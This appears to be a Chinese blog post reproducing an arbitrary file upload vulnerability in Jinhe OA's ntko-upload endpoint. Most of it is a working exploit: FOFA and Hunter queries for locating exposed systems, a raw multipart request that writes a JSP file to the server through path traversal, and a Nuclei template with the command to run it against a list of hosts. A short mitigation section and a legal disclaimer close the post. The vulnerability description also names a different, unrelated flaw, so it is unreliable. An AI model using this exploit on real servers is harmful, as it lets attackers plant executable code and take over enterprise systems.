【漏洞复现】金和OA 任意文件上传

【产品介绍】

金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。

【漏洞介绍】

金和OA sap-b1config-aspx接口存在未授权,攻击者可通过此漏洞获取敏感信息。

【资产测绘Query】

Fofa语法:app=”金和网络-金和OA”

Hunter语法:app.name=”金和 OA”

【产品界面】

【漏洞复现】

 
  1. POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1
  2. Host: 127.0.0.1
  3. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  6. Accept-Encoding: gzip, deflate
  7. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
  8. Connection: close
  9. Content-Length: 444
  10. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  11. Content-Disposition: form-data; name="filename"
  12. ../../../../upload/123.jsp
  13. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  14. Content-Disposition: form-data; name="upLoadFile"; filename="a.jpg"
  15. Content-Type: image/jpeg
  16. <% out.println("Hello, World!"); %>
  17. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  18. Content-Disposition: form-data; name="Submit"
  19. upload
  20. ------WebKitFormBoundary5iALAXlSiqxJXrhK--


成功上传,访问路径upload/123.jsp

【Nuclei-Poc】

 
  1. id: example-file-upload
  2. info:
  3. name: Example File Upload
  4. author: your-name
  5. severity: high
  6. requests:
  7. - raw:
  8. - |
  9. POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1
  10. Host: {{Hostname}}
  11. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK
  12. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67
  13. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  14. Accept-Encoding: gzip, deflate
  15. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
  16. Connection: close
  17. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  18. Content-Disposition: form-data; name="filename"
  19. ../../../../upload/test.jsp
  20. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  21. Content-Disposition: form-data; name="upLoadFile"; filename="test.jpg"
  22. Content-Type: image/jpeg
  23. <% out.println("Hello, World!"); %>
  24. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  25. Content-Disposition: form-data; name="Submit"
  26. upload
  27. ------WebKitFormBoundary5iALAXlSiqxJXrhK--
  28. - |
  29. GET /upload/test.jsp HTTP/1.1
  30. Host: {{Hostname}}
  31. Accept: */*
  32. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67
  33. matchers-condition: and
  34. matchers:
  35. - type: word
  36. words:
  37. - "Hello, World!"
  38. part: body
  39. - type: status
  40. status:
  41. - 200

【验证】

.\nuclei -l 1.txt -t 6.yaml

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

OA JC6是一套企业办公协同软件,用于企业内部的办公流程管理与协同办公。而NTKO-Upload是OA JC6中的一个模块,用于用户在办公过程中上传文件进行共享和交流。 然而,OA JC6和NTKO-Upload存在一个任意文件上传漏洞。该漏洞可能会被恶意攻击者利用,上传恶意文件,从而对系统造成潜在的安全风险。 恶意上传的文件可能包含恶意代码、病毒或其他有害的文件,攻击者可通过这些文件获取系统权限、窃取敏感信息、篡改数据等。由于OA JC6广泛应用于企业内部,一旦该漏洞被利用,可能会对企业的信息安全带来严重威胁。 为了防止利用这个漏洞进行任意文件上传的攻击,建议用户采取以下措施: 1. 及时升级OA JC6和NTKO-Upload软件,确保软件的最新版本中修复了该漏洞。 2. 对OA JC6和NTKO-Upload进行适当的安全配置,禁用或限制用户上传的文件类型和大小,只允许上传安全可信的文件。 3. 定期进行系统漏洞扫描和安全评估,及时发现并修复可能存在的漏洞。 4. 配置防火墙和入侵检测系统,及时发现和阻止恶意上传行为。 5. 培训企业员工,提高其安全意识,警惕不明文件的上传和下载。 总之,任意文件上传漏洞OA JC6和NTKO-Upload的安全构成潜在威胁,为保护企业信息安全,必须采取相应的安全防护措施,并保持软件的更新和维护。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值